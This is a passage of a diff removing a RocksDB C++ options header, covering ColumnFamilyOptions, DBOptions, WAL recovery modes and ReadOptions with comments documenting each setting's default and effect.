-  // from a single thread and so does not need to be thread-safe.
-  //
-  // Default: nullptr
-  std::shared_ptr<CompactionFilterFactory> compaction_filter_factory = nullptr;
-
-  // -------------------
-  // Parameters that affect performance
-
-  // Amount of data to build up in memory (backed by an unsorted log
-  // on disk) before converting to a sorted on-disk file.
-  //
-  // Larger values increase performance, especially during bulk loads.
-  // Up to max_write_buffer_number write buffers may be held in memory
-  // at the same time,
-  // so you may wish to adjust this parameter to control memory usage.
-  // Also, a larger write buffer will result in a longer recovery time
-  // the next time the database is opened.
-  //
-  // Note that write_buffer_size is enforced per column family.
-  // See db_write_buffer_size for sharing memory across column families.
-  //
-  // Default: 64MB
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t write_buffer_size = 64 << 20;
-
-  // Compress blocks using the specified compression algorithm.  This
-  // parameter can be changed dynamically.
-  //
-  // Default: kSnappyCompression, if it's supported. If snappy is not linked
-  // with the library, the default is kNoCompression.
-  //
-  // Typical speeds of kSnappyCompression on an Intel(R) Core(TM)2 2.4GHz:
-  //    ~200-500MB/s compression
-  //    ~400-800MB/s decompression
-  // Note that these speeds are significantly faster than most
-  // persistent storage speeds, and therefore it is typically never
-  // worth switching to kNoCompression.  Even if the input data is
-  // incompressible, the kSnappyCompression implementation will
-  // efficiently detect that and will switch to uncompressed mode.
-  CompressionType compression;
-
-  // Compression algorithm that will be used for the bottommost level that
-  // contain files. If level-compaction is used, this option will only affect
-  // levels after base level.
-  //
-  // Default: kDisableCompressionOption (Disabled)
-  CompressionType bottommost_compression = kDisableCompressionOption;
-
-  // different options for compression algorithms
-  CompressionOptions compression_opts;
-
-  // Number of files to trigger level-0 compaction. A value <0 means that
-  // level-0 compaction will not be triggered by number of files at all.
-  //
-  // Default: 4
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_file_num_compaction_trigger = 4;
-
-  // If non-nullptr, use the specified function to determine the
-  // prefixes for keys.  These prefixes will be placed in the filter.
-  // Depending on the workload, this can reduce the number of read-IOP
-  // cost for scans when a prefix is passed via ReadOptions to
-  // db.NewIterator().  For prefix filtering to work properly,
-  // "prefix_extractor" and "comparator" must be such that the following
-  // properties hold:
-  //
-  // 1) key.starts_with(prefix(key))
-  // 2) Compare(prefix(key), key) <= 0.
-  // 3) If Compare(k1, k2) <= 0, then Compare(prefix(k1), prefix(k2)) <= 0
-  // 4) prefix(prefix(key)) == prefix(key)
-  //
-  // Default: nullptr
-  std::shared_ptr<const SliceTransform> prefix_extractor = nullptr;
-
-  // Control maximum total data size for a level.
-  // max_bytes_for_level_base is the max total for level-1.
-  // Maximum number of bytes for level L can be calculated as
-  // (max_bytes_for_level_base) * (max_bytes_for_level_multiplier ^ (L-1))
-  // For example, if max_bytes_for_level_base is 200MB, and if
-  // max_bytes_for_level_multiplier is 10, total data size for level-1
-  // will be 200MB, total file size for level-2 will be 2GB,
-  // and total file size for level-3 will be 20GB.
-  //
-  // Default: 256MB.
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t max_bytes_for_level_base = 256 * 1048576;
-
-  // Disable automatic compactions. Manual compactions can still
-  // be issued on this column family
-  //
-  // Dynamically changeable through SetOptions() API
-  bool disable_auto_compactions = false;
-
-  // This is a factory that provides TableFactory objects.
-  // Default: a block-based table factory that provides a default
-  // implementation of TableBuilder and TableReader with default
-  // BlockBasedTableOptions.
-  std::shared_ptr<TableFactory> table_factory;
-
-  // Create ColumnFamilyOptions with default values for all fields
-  ColumnFamilyOptions();
-  // Create ColumnFamilyOptions from Options
-  explicit ColumnFamilyOptions(const Options& options);
-
-  void Dump(Logger* log) const;
-};
-
-enum class WALRecoveryMode : char {
-  // Original levelDB recovery
-  // We tolerate incomplete record in trailing data on all logs
-  // Use case : This is legacy behavior (default)
-  kTolerateCorruptedTailRecords = 0x00,
-  // Recover from clean shutdown
-  // We don't expect to find any corruption in the WAL
-  // Use case : This is ideal for unit tests and rare applications that
-  // can require high consistency guarantee
-  kAbsoluteConsistency = 0x01,
-  // Recover to point-in-time consistency
-  // We stop the WAL playback on discovering WAL inconsistency
-  // Use case : Ideal for systems that have disk controller cache like
-  // hard disk, SSD without super capacitor that store related data
-  kPointInTimeRecovery = 0x02,
-  // Recovery after a disaster
-  // We ignore any corruption in the WAL and try to salvage as much data as
-  // possible
-  // Use case : Ideal for last ditch effort to recover data or systems that
-  // operate with low grade unrelated data
-  kSkipAnyCorruptedRecords = 0x03,
-};
-
-struct DbPath {
-  std::string path;
-  uint64_t target_size;  // Target size of total files under the path, in byte.
-
-  DbPath() : target_size(0) {}
-  DbPath(const std::string& p, uint64_t t) : path(p), target_size(t) {}
-};
-
-
-struct DBOptions {
-  // The function recovers options to the option as in version 4.6.
-  DBOptions* OldDefaults(int rocksdb_major_version = 4,
-                         int rocksdb_minor_version = 6);
-
-  // Some functions that make it easier to optimize RocksDB
-
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  DBOptions* OptimizeForSmallDb();
-
-#ifndef ROCKSDB_LITE
-  // By default, RocksDB uses only one background thread for flush and
-  // compaction. Calling this function will set it up such that total of
-  // `total_threads` is used. Good value for `total_threads` is the number of
-  // cores. You almost definitely want to call this function if your system is
-  // bottlenecked by RocksDB.
-  DBOptions* IncreaseParallelism(int total_threads = 16);
-#endif  // ROCKSDB_LITE
-
-  // If true, the database will be created if it is missing.
-  // Default: false
-  bool create_if_missing = false;
-
-  // If true, missing column families will be automatically created.
-  // Default: false
-  bool create_missing_column_families = false;
-
-  // If true, an error is raised if the database already exists.
-  // Default: false
-  bool error_if_exists = false;
-
-  // If true, RocksDB will aggressively check consistency of the data.
-  // Also, if any of the  writes to the database fails (Put, Delete, Merge,
-  // Write), the database will switch to read-only mode and fail all other
-  // Write operations.
-  // In most cases you want this to be set to true.
-  // Default: true
-  bool paranoid_checks = true;
-
-  // Use the specified object to interact with the environment,
-  // e.g. to read/write files, schedule background work, etc.
-  // Default: Env::Default()
-  Env* env = Env::Default();
-
-  // Use to control write rate of flush and compaction. Flush has higher
-  // priority than compaction. Rate limiting is disabled if nullptr.
-  // If rate limiter is enabled, bytes_per_sync is set to 1MB by default.
-  // Default: nullptr
-  std::shared_ptr<RateLimiter> rate_limiter = nullptr;
-
-  // Use to track SST files and control their file deletion rate.
-  //
-  // Features:
-  //  - Throttle the deletion rate of the SST files.
-  //  - Keep track the total size of all SST files.
-  //  - Set a maximum allowed space limit for SST files that when reached
-  //    the DB wont do any further flushes or compactions and will set the
-  //    background error.
-  //  - Can be shared between multiple dbs.
-  // Limitations:
-  //  - Only track and throttle deletes of SST files in
-  //    first db_path (db_name if db_paths is empty).
-  //
-  // Default: nullptr
-  std::shared_ptr<SstFileManager> sst_file_manager = nullptr;
-
-  // Any internal progress/error information generated by the db will
-  // be written to info_log if it is non-nullptr, or to a file stored
-  // in the same directory as the DB contents if info_log is nullptr.
-  // Default: nullptr
-  std::shared_ptr<Logger> info_log = nullptr;
-
-#ifdef NDEBUG
-      InfoLogLevel info_log_level = INFO_LEVEL;
-#else
-      InfoLogLevel info_log_level = DEBUG_LEVEL;
-#endif  // NDEBUG
-
-  // Number of open files that can be used by the DB.  You may need to
-  // increase this if your database has a large working set. Value -1 means
-  // files opened are always kept open. You can estimate number of files based
-  // on target_file_size_base and target_file_size_multiplier for level-based
-  // compaction. For universal-style compaction, you can usually set it to -1.
-  // Default: -1
-  int max_open_files = -1;
-
-  // If max_open_files is -1, DB will open all files on DB::Open(). You can
-  // use this option to increase the number of threads used to open the files.
-  // Default: 16
-  int max_file_opening_threads = 16;
-
-  // Once write-ahead logs exceed this size, we will start forcing the flush of
-  // column families whose memtables are backed by the oldest live WAL file
-  // (i.e. the ones that are causing all the space amplification). If set to 0
-  // (default), we will dynamically choose the WAL size limit to be
-  // [sum of all write_buffer_size * max_write_buffer_number] * 4
-  // Default: 0
-  uint64_t max_total_wal_size = 0;
-
-  // If non-null, then we should collect metrics about database operations
-  std::shared_ptr<Statistics> statistics = nullptr;
-
-  // If true, then every store to stable storage will issue a fsync.
-  // If false, then every store to stable storage will issue a fdatasync.
-  // This parameter should be set to true while storing data to
-  // filesystem like ext3 that can lose files after a reboot.
-  // Default: false
-  // Note: on many platforms fdatasync is defined as fsync, so this parameter
-  // would make no difference. Refer to fdatasync definition in this code base.
-  bool use_fsync = false;
-
-  // A list of paths where SST files can be put into, with its target size.
-  // Newer data is placed into paths specified earlier in the vector while
-  // older data gradually moves to paths specified later in the vector.
-  //
-  // For example, you have a flash device with 10GB allocated for the DB,
-  // as well as a hard drive of 2TB, you should config it to be:
-  //   [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-  //
-  // The system will try to guarantee data under each path is close to but
-  // not larger than the target size. But current and future file sizes used
-  // by determining where to place a file are based on best-effort estimation,
-  // which means there is a chance that the actual size under the directory
-  // is slightly more than target size under some workloads. User should give
-  // some buffer room for those cases.
-  //
-  // If none of the paths has sufficient room to place a file, the file will
-  // be placed to the last path anyway, despite to the target size.
-  //
-  // Placing newer data to earlier paths is also best-efforts. User should
-  // expect user files to be placed in higher levels in some extreme cases.
-  //
-  // If left empty, only one path will be used, which is db_name passed when
-  // opening the DB.
-  // Default: empty
-  std::vector<DbPath> db_paths;
-
-  // This specifies the info LOG dir.
-  // If it is empty, the log files will be in the same dir as data.
-  // If it is non empty, the log files will be in the specified dir,
-  // and the db data dir's absolute path will be used as the log file
-  // name's prefix.
-  std::string db_log_dir = "";
-
-  // This specifies the absolute dir path for write-ahead logs (WAL).
-  // If it is empty, the log files will be in the same dir as data,
-  //   dbname is used as the data dir by default
-  // If it is non empty, the log files will be in kept the specified dir.
-  // When destroying the db,
-  //   all log files in wal_dir and the dir itself is deleted
-  std::string wal_dir = "";
-
-  // The periodicity when obsolete files get deleted. The default
-  // value is 6 hours. The files that get out of scope by compaction
-  // process will still get automatically delete on every compaction,
-  // regardless of this setting
-  uint64_t delete_obsolete_files_period_micros = 6ULL * 60 * 60 * 1000000;
-
-  // Maximum number of concurrent background jobs (compactions and flushes).
-  int max_background_jobs = 2;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. This option is ignored.
-  int base_background_compactions = -1;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. For backwards compatibility we will set
-  // `max_background_jobs = max_background_compactions + max_background_flushes`
-  // in the case where user sets at least one of `max_background_compactions` or
-  // `max_background_flushes` (we replace -1 by 1 in case one option is unset).
-  //
-  // Maximum number of concurrent background compaction jobs, submitted to
-  // the default LOW priority thread pool.
-  //
-  // If you're increasing this, also consider increasing number of threads in
-  // LOW priority thread pool. For more information, see
-  // Env::SetBackgroundThreads
-  // Default: -1
-  int max_background_compactions = -1;
-
-  // This value represents the maximum number of threads that will
-  // concurrently perform a compaction job by breaking it into multiple,
-  // smaller ones that are run simultaneously.
-  // Default: 1 (i.e. no subcompactions)
-  uint32_t max_subcompactions = 1;
-
-  // NOT SUPPORTED ANYMORE: RocksDB automatically decides this based on the
-  // value of max_background_jobs. For backwards compatibility we will set
-  // `max_background_jobs = max_background_compactions + max_background_flushes`
-  // in the case where user sets at least one of `max_background_compactions` or
-  // `max_background_flushes`.
-  //
-  // Maximum number of concurrent background memtable flush jobs, submitted by
-  // default to the HIGH priority thread pool. If the HIGH priority thread pool
-  // is configured to have zero threads, flush jobs will share the LOW priority
-  // thread pool with compaction jobs.
-  //
-  // It is important to use both thread pools when the same Env is shared by
-  // multiple db instances. Without a separate pool, long running compaction
-  // jobs could potentially block memtable flush jobs of other db instances,
-  // leading to unnecessary Put stalls.
-  //
-  // If you're increasing this, also consider increasing number of threads in
-  // HIGH priority thread pool. For more information, see
-  // Env::SetBackgroundThreads
-  // Default: -1
-  int max_background_flushes = -1;
-
-  // Specify the maximal size of the info log file. If the log file
-  // is larger than `max_log_file_size`, a new info log file will
-  // be created.
-  // If max_log_file_size == 0, all logs will be written to one
-  // log file.
-  size_t max_log_file_size = 0;
-
-  // Time for the info log file to roll (in seconds).
-  // If specified with non-zero value, log file will be rolled
-  // if it has been active longer than `log_file_time_to_roll`.
-  // Default: 0 (disabled)
-  // Not supported in ROCKSDB_LITE mode!
-  size_t log_file_time_to_roll = 0;
-
-  // Maximal info log files to be kept.
-  // Default: 1000
-  size_t keep_log_file_num = 1000;
-
-  // Recycle log files.
-  // If non-zero, we will reuse previously written log files for new
-  // logs, overwriting the old data.  The value indicates how many
-  // such files we will keep around at any point in time for later
-  // use.  This is more efficient because the blocks are already
-  // allocated and fdatasync does not need to update the inode after
-  // each write.
-  // Default: 0
-  size_t recycle_log_file_num = 0;
-
-  // manifest file is rolled over on reaching this limit.
-  // The older manifest file be deleted.
-  // The default value is MAX_INT so that roll-over does not take place.
-  uint64_t max_manifest_file_size = std::numeric_limits<uint64_t>::max();
-
-  // Number of shards used for table cache.
-  int table_cache_numshardbits = 6;
-
-  // NOT SUPPORTED ANYMORE
-  // int table_cache_remove_scan_count_limit;
-
-  // The following two fields affect how archived logs will be deleted.
-  // 1. If both set to 0, logs will be deleted asap and will not get into
-  //    the archive.
-  // 2. If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-  //    WAL files will be checked every 10 min and if total size is greater
-  //    then WAL_size_limit_MB, they will be deleted starting with the
-  //    earliest until size_limit is met. All empty files will be deleted.
-  // 3. If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-  //    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-  //    are older than WAL_ttl_seconds will be deleted.
-  // 4. If both are not 0, WAL files will be checked every 10 min and both
-  //    checks will be performed with ttl being first.
-  uint64_t WAL_ttl_seconds = 0;
-  uint64_t WAL_size_limit_MB = 0;
-
-  // Number of bytes to preallocate (via fallocate) the manifest
-  // files.  Default is 4mb, which is reasonable to reduce random IO
-  // as well as prevent overallocation for mounts that preallocate
-  // large amounts of data (such as xfs's allocsize option).
-  size_t manifest_preallocation_size = 4 * 1024 * 1024;
-
-  // Allow the OS to mmap file for reading sst tables. Default: false
-  bool allow_mmap_reads = false;
-
-  // Allow the OS to mmap file for writing.
-  // DB::SyncWAL() only works if this is set to false.
-  // Default: false
-  bool allow_mmap_writes = false;
-
-  // Enable direct I/O mode for read/write
-  // they may or may not improve performance depending on the use case
-  //
-  // Files will be opened in "direct I/O" mode
-  // which means that data r/w from the disk will not be cached or
-  // buffered. The hardware buffer of the devices may however still
-  // be used. Memory mapped files are not impacted by these parameters.
-
-  // Use O_DIRECT for user reads
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool use_direct_reads = false;
-
-  // Use O_DIRECT for both reads and writes in background flush and compactions
-  // When true, we also force new_table_reader_for_compaction_inputs to true.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool use_direct_io_for_flush_and_compaction = false;
-
-  // If false, fallocate() calls are bypassed
-  bool allow_fallocate = true;
-
-  // Disable child process inherit open files. Default: true
-  bool is_fd_close_on_exec = true;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  bool skip_log_error_on_recovery = false;
-
-  // if not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-  // Default: 600 (10 min)
-  unsigned int stats_dump_period_sec = 600;
-
-  // If set true, will hint the underlying file system that the file
-  // access pattern is random, when a sst file is opened.
-  // Default: true
-  bool advise_random_on_open = true;
-
-  // Amount of data to build up in memtables across all column
-  // families before writing to disk.
-  //
-  // This is distinct from write_buffer_size, which enforces a limit
-  // for a single memtable.
-  //
-  // This feature is disabled by default. Specify a non-zero value
-  // to enable it.
-  //
-  // Default: 0 (disabled)
-  size_t db_write_buffer_size = 0;
-
-  // The memory usage of memtable will report to this object. The same object
-  // can be passed into multiple DBs and it will track the sum of size of all
-  // the DBs. If the total size of all live memtables of all the DBs exceeds
-  // a limit, a flush will be triggered in the next DB to which the next write
-  // is issued.
-  //
-  // If the object is only passed to on DB, the behavior is the same as
-  // db_write_buffer_size. When write_buffer_manager is set, the value set will
-  // override db_write_buffer_size.
-  //
-  // This feature is disabled by default. Specify a non-zero value
-  // to enable it.
-  //
-  // Default: null
-  std::shared_ptr<WriteBufferManager> write_buffer_manager = nullptr;
-
-  // Specify the file access pattern once a compaction is started.
-  // It will be applied to all input files of a compaction.
-  // Default: NORMAL
-  enum AccessHint {
-      NONE,
-      NORMAL,
-      SEQUENTIAL,
-      WILLNEED
-  };
-  AccessHint access_hint_on_compaction_start = NORMAL;
-
-  // If true, always create a new file descriptor and new table reader
-  // for compaction inputs. Turn this parameter on may introduce extra
-  // memory usage in the table reader, if it allocates extra memory
-  // for indexes. This will allow file descriptor prefetch options
-  // to be set for compaction input files and not to impact file
-  // descriptors for the same file used by user queries.
-  // Suggest to enable BlockBasedTableOptions.cache_index_and_filter_blocks
-  // for this mode if using block-based table.
-  //
-  // Default: false
-  bool new_table_reader_for_compaction_inputs = false;
-
-  // If non-zero, we perform bigger reads when doing compaction. If you're
-  // running RocksDB on spinning disks, you should set this to at least 2MB.
-  // That way RocksDB's compaction is doing sequential instead of random reads.
-  //
-  // When non-zero, we also force new_table_reader_for_compaction_inputs to
-  // true.
-  //
-  // Default: 0
-  size_t compaction_readahead_size = 0;
-
-  // This is a maximum buffer size that is used by WinMmapReadableFile in
-  // unbuffered disk I/O mode. We need to maintain an aligned buffer for
-  // reads. We allow the buffer to grow until the specified value and then
-  // for bigger requests allocate one shot buffers. In unbuffered mode we
-  // always bypass read-ahead buffer at ReadaheadRandomAccessFile
-  // When read-ahead is required we then make use of compaction_readahead_size
-  // value and always try to read ahead. With read-ahead we always
-  // pre-allocate buffer to the size instead of growing it up to a limit.
-  //
-  // This option is currently honored only on Windows
-  //
-  // Default: 1 Mb
-  //
-  // Special value: 0 - means do not maintain per instance buffer. Allocate
-  //                per request buffer and avoid locking.
-  size_t random_access_max_buffer_size = 1024 * 1024;
-
-  // This is the maximum buffer size that is used by WritableFileWriter.
-  // On Windows, we need to maintain an aligned buffer for writes.
-  // We allow the buffer to grow until it's size hits the limit in buffered
-  // IO and fix the buffer size when using direct IO to ensure alignment of
-  // write requests if the logical sector size is unusual
-  //
-  // Default: 1024 * 1024 (1 MB)
-  size_t writable_file_max_buffer_size = 1024 * 1024;
-
-
-  // Use adaptive mutex, which spins in the user space before resorting
-  // to kernel. This could reduce context switch when the mutex is not
-  // heavily contended. However, if the mutex is hot, we could end up
-  // wasting spin time.
-  // Default: false
-  bool use_adaptive_mutex = false;
-
-  // Create DBOptions with default values for all fields
-  DBOptions();
-  // Create DBOptions from Options
-  explicit DBOptions(const Options& options);
-
-  void Dump(Logger* log) const;
-
-  // Allows OS to incrementally sync files to disk while they are being
-  // written, asynchronously, in the background. This operation can be used
-  // to smooth out write I/Os over time. Users shouldn't rely on it for
-  // persistency guarantee.
-  // Issue one request for every bytes_per_sync written. 0 turns it off.
-  // Default: 0
-  //
-  // You may consider using rate_limiter to regulate write rate to device.
-  // When rate limiter is enabled, it automatically enables bytes_per_sync
-  // to 1MB.
-  //
-  // This option applies to table files
-  uint64_t bytes_per_sync = 0;
-
-  // Same as bytes_per_sync, but applies to WAL files
-  // Default: 0, turned off
-  uint64_t wal_bytes_per_sync = 0;
-
-  // A vector of EventListeners which call-back functions will be called
-  // when specific RocksDB event happens.
-  std::vector<std::shared_ptr<EventListener>> listeners;
-
-  // If true, then the status of the threads involved in this DB will
-  // be tracked and available via GetThreadList() API.
-  //
-  // Default: false
-  bool enable_thread_tracking = false;
-
-  // The limited write rate to DB if soft_pending_compaction_bytes_limit or
-  // level0_slowdown_writes_trigger is triggered, or we are writing to the
-  // last mem table allowed and we allow more than 3 mem tables. It is
-  // calculated using size of user write requests before compression.
-  // RocksDB may decide to slow down more if the compaction still
-  // gets behind further.
-  // If the value is 0, we will infer a value from `rater_limiter` value
-  // if it is not empty, or 16MB if `rater_limiter` is empty. Note that
-  // if users change the rate in `rate_limiter` after DB is opened,
-  // `delayed_write_rate` won't be adjusted.
-  //
-  // Unit: byte per second.
-  //
-  // Default: 0
-  uint64_t delayed_write_rate = 0;
-
-  // By default, a single write thread queue is maintained. The thread gets
-  // to the head of the queue becomes write batch group leader and responsible
-  // for writing to WAL and memtable for the batch group.
-  //
-  // If enable_pipelined_write is true, separate write thread queue is
-  // maintained for WAL write and memtable write. A write thread first enter WAL
-  // writer queue and then memtable writer queue. Pending thread on the WAL
-  // writer queue thus only have to wait for previous writers to finish their
-  // WAL writing but not the memtable writing. Enabling the feature may improve
-  // write throughput and reduce latency of the prepare phase of two-phase
-  // commit.
-  //
-  // Default: false
-  bool enable_pipelined_write = false;
-
-  // If true, allow multi-writers to update mem tables in parallel.
-  // Only some memtable_factory-s support concurrent writes; currently it
-  // is implemented only for SkipListFactory.  Concurrent memtable writes
-  // are not compatible with inplace_update_support or filter_deletes.
-  // It is strongly recommended to set enable_write_thread_adaptive_yield
-  // if you are going to use this feature.
-  //
-  // Default: true
-  bool allow_concurrent_memtable_write = true;
-
-  // If true, threads synchronizing with the write batch group leader will
-  // wait for up to write_thread_max_yield_usec before blocking on a mutex.
-  // This can substantially improve throughput for concurrent workloads,
-  // regardless of whether allow_concurrent_memtable_write is enabled.
-  //
-  // Default: true
-  bool enable_write_thread_adaptive_yield = true;
-
-  // The maximum number of microseconds that a write operation will use
-  // a yielding spin loop to coordinate with other write threads before
-  // blocking on a mutex.  (Assuming write_thread_slow_yield_usec is
-  // set properly) increasing this value is likely to increase RocksDB
-  // throughput at the expense of increased CPU usage.
-  //
-  // Default: 100
-  uint64_t write_thread_max_yield_usec = 100;
-
-  // The latency in microseconds after which a std::this_thread::yield
-  // call (sched_yield on Linux) is considered to be a signal that
-  // other processes or threads would like to use the current core.
-  // Increasing this makes writer threads more likely to take CPU
-  // by spinning, which will show up as an increase in the number of
-  // involuntary context switches.
-  //
-  // Default: 3
-  uint64_t write_thread_slow_yield_usec = 3;
-
-  // If true, then DB::Open() will not update the statistics used to optimize
-  // compaction decision by loading table properties from many files.
-  // Turning off this feature will improve DBOpen time especially in
-  // disk environment.
-  //
-  // Default: false
-  bool skip_stats_update_on_db_open = false;
-
-  // Recovery mode to control the consistency while replaying WAL
-  // Default: kPointInTimeRecovery
-  WALRecoveryMode wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-
-  // if set to false then recovery will fail when a prepared
-  // transaction is encountered in the WAL
-  bool allow_2pc = false;
-
-  // A global cache for table-level rows.
-  // Default: nullptr (disabled)
-  // Not supported in ROCKSDB_LITE mode!
-  std::shared_ptr<Cache> row_cache = nullptr;
-
-#ifndef ROCKSDB_LITE
-  // A filter object supplied to be invoked while processing write-ahead-logs
-  // (WALs) during recovery. The filter provides a way to inspect log
-  // records, ignoring a particular record or skipping replay.
-  // The filter is invoked at startup and is invoked from a single-thread
-  // currently.
-  WalFilter* wal_filter = nullptr;
-#endif  // ROCKSDB_LITE
-
-  // If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-  // / SetOptions will fail if options file is not detected or properly
-  // persisted.
-  //
-  // DEFAULT: false
-  bool fail_if_options_file_error = false;
-
-  // If true, then print malloc stats together with rocksdb.stats
-  // when printing to LOG.
-  // DEFAULT: false
-  bool dump_malloc_stats = false;
-
-  // By default RocksDB replay WAL logs and flush them on DB open, which may
-  // create very small SST files. If this option is enabled, RocksDB will try
-  // to avoid (but not guarantee not to) flush during recovery. Also, existing
-  // WAL logs will be kept, so that if crash happened before flush, we still
-  // have logs to recover from.
-  //
-  // DEFAULT: false
-  bool avoid_flush_during_recovery = false;
-
-  // By default RocksDB will flush all memtables on DB close if there are
-  // unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-  // DB close. Unpersisted data WILL BE LOST.
-  //
-  // DEFAULT: false
-  //
-  // Dynamically changeable through SetDBOptions() API.
-  bool avoid_flush_during_shutdown = false;
-
-  // Set this option to true during creation of database if you want
-  // to be able to ingest behind (call IngestExternalFile() skipping keys
-  // that already exist, rather than overwriting matching keys).
-  // Setting this option to true will affect 2 things:
-  // 1) Disable some internal optimizations around SST file compression
-  // 2) Reserve bottom-most level for ingested files only.
-  // 3) Note that num_levels should be >= 3 if this option is turned on.
-  //
-  // DEFAULT: false
-  // Immutable.
-  bool allow_ingest_behind = false;
-
-  // If enabled it uses two queues for writes, one for the ones with
-  // disable_memtable and one for the ones that also write to memtable. This
-  // allows the memtable writes not to lag behind other writes. It can be used
-  // to optimize MySQL 2PC in which only the commits, which are serial, write to
-  // memtable.
-  bool concurrent_prepare = false;
-
-  // If true WAL is not flushed automatically after each write. Instead it
-  // relies on manual invocation of FlushWAL to write the WAL buffer to its
-  // file.
-  bool manual_wal_flush = false;
-};
-
-// Options to control the behavior of a database (passed to DB::Open)
-struct Options : public DBOptions, public ColumnFamilyOptions {
-  // Create an Options object with default values for all fields.
-  Options() : DBOptions(), ColumnFamilyOptions() {}
-
-  Options(const DBOptions& db_options,
-          const ColumnFamilyOptions& column_family_options)
-      : DBOptions(db_options), ColumnFamilyOptions(column_family_options) {}
-
-  // The function recovers options to the option as in version 4.6.
-  Options* OldDefaults(int rocksdb_major_version = 4,
-                       int rocksdb_minor_version = 6);
-
-  void Dump(Logger* log) const;
-
-  void DumpCFOptions(Logger* log) const;
-
-  // Some functions that make it easier to optimize RocksDB
-
-  // Set appropriate parameters for bulk loading.
-  // The reason that this is a function that returns "this" instead of a
-  // constructor is to enable chaining of multiple similar calls in the future.
-  //
-
-  // All data will be in level 0 without any automatic compaction.
-  // It's recommended to manually call CompactRange(NULL, NULL) before reading
-  // from the database, because otherwise the read can be very slow.
-  Options* PrepareForBulkLoad();
-
-  // Use this if your DB is very small (like under 1GB) and you don't want to
-  // spend lots of memory for memtables.
-  Options* OptimizeForSmallDb();
-};
-
-//
-// An application can issue a read request (via Get/Iterators) and specify
-// if that read should process data that ALREADY resides on a specified cache
-// level. For example, if an application specifies kBlockCacheTier then the
-// Get call will process data that is already processed in the memtable or
-// the block cache. It will not page in data from the OS cache or data that
-// resides in storage.
-enum ReadTier {
-  kReadAllTier = 0x0,     // data in memtable, block cache, OS cache or storage
-  kBlockCacheTier = 0x1,  // data in memtable or block cache
-  kPersistedTier = 0x2,   // persisted data.  When WAL is disabled, this option
-                          // will skip data in memtable.
-                          // Note that this ReadTier currently only supports
-                          // Get and MultiGet and does not support iterators.
-  kMemtableTier = 0x3     // data in memtable. used for memtable-only iterators.
-};
-
-// Options that control read operations
-struct ReadOptions {
-  // If "snapshot" is non-nullptr, read as of the supplied snapshot
-  // (which must belong to the DB that is being read and which must
-  // not have been released).  If "snapshot" is nullptr, use an implicit
-  // snapshot of the state at the beginning of this read operation.
-  // Default: nullptr
-  const Snapshot* snapshot;
-
-  // "iterate_upper_bound" defines the extent upto which the forward iterator
-  // can returns entries. Once the bound is reached, Valid() will be false.
-  // "iterate_upper_bound" is exclusive ie the bound value is
-  // not a valid entry.  If iterator_extractor is not null, the Seek target
-  // and iterator_upper_bound need to have the same prefix.
-  // This is because ordering is not guaranteed outside of prefix domain.
-  // There is no lower bound on the iterator. If needed, that can be easily
-  // implemented.
-  //
-  // Default: nullptr
-  const Slice* iterate_upper_bound;
-
-  // If non-zero, NewIterator will create a new table reader which
-  // performs reads of the given size. Using a large size (> 2MB) can
-  // improve the performance of forward iteration on spinning disks.
-  // Default: 0
-  size_t readahead_size;
-
-  // A threshold for the number of keys that can be skipped before failing an
-  // iterator seek as incomplete. The default value of 0 should be used to
-  // never fail a request as incomplete, even on skipping too many keys.
-  // Default: 0
-  uint64_t max_skippable_internal_keys;
-
-  // Specify if this read request should process data that ALREADY
-  // resides on a particular cache. If the required data is not
-  // found at the specified cache, then Status::Incomplete is returned.
-  // Default: kReadAllTier
-  ReadTier read_tier;
-
-  // If true, all data read from underlying storage will be
-  // verified against corresponding checksums.
-  // Default: true
-  bool verify_checksums;
-
-  // Should the "data block"/"index block"/"filter block" read for this
-  // iteration be cached in memory?
-  // Callers may wish to set this field to false for bulk scans.
-  // Default: true
-  bool fill_cache;
-
-  // Specify to create a tailing iterator -- a special iterator that has a
-  // view of the complete database (i.e. it can also be used to read newly
-  // added data) and is optimized for sequential reads. It will return records
-  // that were inserted into the database after the creation of the iterator.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool tailing;
-
-  // Specify to create a managed iterator -- a special iterator that
-  // uses less resources by having the ability to free its underlying
-  // resources on request.
-  // Default: false
-  // Not supported in ROCKSDB_LITE mode!
-  bool managed;
-
-  // Enable a total order seek regardless of index format (e.g. hash index)
-  // used in the table. Some table format (e.g. plain table) may not support
-  // this option.
-  // If true when calling Get(), we also skip prefix bloom when reading from
-  // block based table. It provides a way to read existing data after
-  // changing implementation of prefix extractor.
-  bool total_order_seek;
-
-  // Enforce that the iterator only iterates over the same prefix as the seek.
-  // This option is effective only for prefix seeks, i.e. prefix_extractor is
-  // non-null for the column family and total_order_seek is false.  Unlike
-  // iterate_upper_bound, prefix_same_as_start only works within a prefix
-  // but in both directions.
-  // Default: false
-  bool prefix_same_as_start;
-
-  // Keep the blocks loaded by the iterator pinned in memory as long as the
-  // iterator is not deleted, If used when reading from tables created with
-  // BlockBasedTableOptions::use_delta_encoding = false,
-  // Iterator's property "rocksdb.iterator.is-key-pinned" is guaranteed to
-  // return 1.
-  // Default: false
-  bool pin_data;
-
-  // If true, when PurgeObsoleteFile is called in CleanupIteratorState, we
-  // schedule a background job in the flush job queue and delete obsolete files
-  // in background.
-  // Default: false
-  bool background_purge_on_iterator_cleanup;
-
-  // If true, keys deleted using the DeleteRange() API will be visible to
-  // readers until they are naturally deleted during compaction. This improves
-  // read performance in DBs with many range deletions.
-  // Default: false
-  bool ignore_range_deletions;
-
-  ReadOptions();
-  ReadOptions(bool cksum, bool cache);
-};
-
